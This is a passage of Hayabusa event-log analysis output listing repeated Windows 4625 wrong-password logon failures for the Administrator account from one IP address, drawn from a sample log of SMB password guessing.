NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:28.065 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: TJgLFM2vrnKuj5N3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:28.106 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: l8HRyDAzwKj9bfnA : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:28.144 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: J65LcwnRgEob9wjY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:28.180 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: yhas9e1fwDZ1Fxvt : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:28.225 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: p5qJRSpjS6tZJjNQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:28.268 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bo4HAgP2tw0GmZ4o : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:28.308 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Zv0cbLCD7E05i0g5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:52:28.349 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FIKsQLk5iPyKoeqM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:28.394 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: RiHAaBszJBGe2deQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:28.442 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: F8em4eOiqze683Cj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:28.481 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 86lXQsnn7dae93tW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:28.524 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Iu8olNGPmhxh6iNu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:28.564 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qZYtN5EMHxcNqID6 : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:28.610 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mtUQGxrMoPkpUQCS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:28.712 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QYh4e3bpePhDoRwr : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:28.760 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: UkC8E9uKpCgD1BHY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:28.814 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5ZCDxpmDZbpGCey3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:28.848 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SS2dxS3WvCrAyiB2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:52:28.897 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: YT3VHxKNf8q14rro : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:28.940 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: fx9HQT3u3Ig6vJ3t : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:28.989 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FukPQsr4SXRshyTn : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:29.037 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7AutKUyPELNRUcA4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:29.081 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 38gBkWcYdZW6Wcdz : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:29.121 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HMKnLRQCDn1CHZdH : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:29.165 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ShGnRYHfVSuPvfcX : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:29.221 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LXVWG3Yl0utv98Zf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:29.268 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VDfa0UebgleQMK5U : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:29.321 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BxTLJJsWs9dOc5JC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:29.372 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: x7cKtymmsQJSM6zZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:52:29.420 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: sbtC0srNyvkIHOSV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:29.452 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wPGlJ6ZjGSfUKrCf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:29.491 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8Uw95Ema8vWlRXKy : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:29.532 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hHTrBmhkjGLTNt2R : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:29.574 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XJeRVGKULJIo76aa : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:29.622 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Kipf0Z2Tse2eWoxa : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:29.672 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bnP7tmMJXDVzIDim : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:29.777 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: CBeMt62oqlIICShT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:29.868 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dIfXRZQkKRJAw4er : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:29.933 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8wrqSJPALo5QtUnS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:29.981 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 81Mm67AdwpPJMCMm : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:52:30.035 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Jwq5jXlMRU1SNLO5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:30.076 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: d7OYj8ynCEl5dG9m : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:30.127 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: YzT8vF7ANYnjSRgd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:30.164 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: m4eYIoww4uL6oYZu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:30.199 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DpO8L2Fky4zYwp2q : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:30.244 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jGmxSy48sphENTiY : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:30.285 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tQVAkjteLFK0hbyE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:30.330 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: UMWKsQ8l0j9fZPfA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:30.381 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2ct7xYUYH9sr7mva : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:30.423 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GBn0XxaPOZQokJ0Z : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:30.463 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nQELRxrGuXqkYgO3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:52:30.509 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5eT0mykgLNZQygq9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:30.557 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qMyIqRidF6oBdzog : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:30.596 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ULnnFcF98k9zpNTl : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:30.648 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: j5k02pcelZNGwF3u : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:30.693 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qfcC6LqJqs0EeGjE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:30.733 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mXALYkkitmyAFq14 : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:30.780 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zIqQmExq22WrW4md : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:30.825 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ydHqjdZhLMI9gjfj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:30.865 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IMSe45VZNPdovPbq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:30.910 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hiHlcR6qNGE0P7TK : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:30.950 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: iT3jPdHr89RqPlyd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:52:30.985 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0QFnABeYK39XEntR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:31.068 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5plMYSBQi5mKmdlk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:31.113 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5TaxWckQUCMgWvCZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:31.153 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 81xZ7iisEyTABmUm : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:31.187 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qYiQ2xjMQFQwH2XY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:31.228 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: eRN8e3yzZzxc2p3A : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:31.275 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QCa6PN0C7XznvipG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:31.311 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hFqjIXbEb7eWUFUi : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:31.357 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FkrVjLgnJZlIyXpk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:31.396 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2r5tyuIYijAXN5be : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:31.442 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: AgjQNe9hQrLIETDn : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
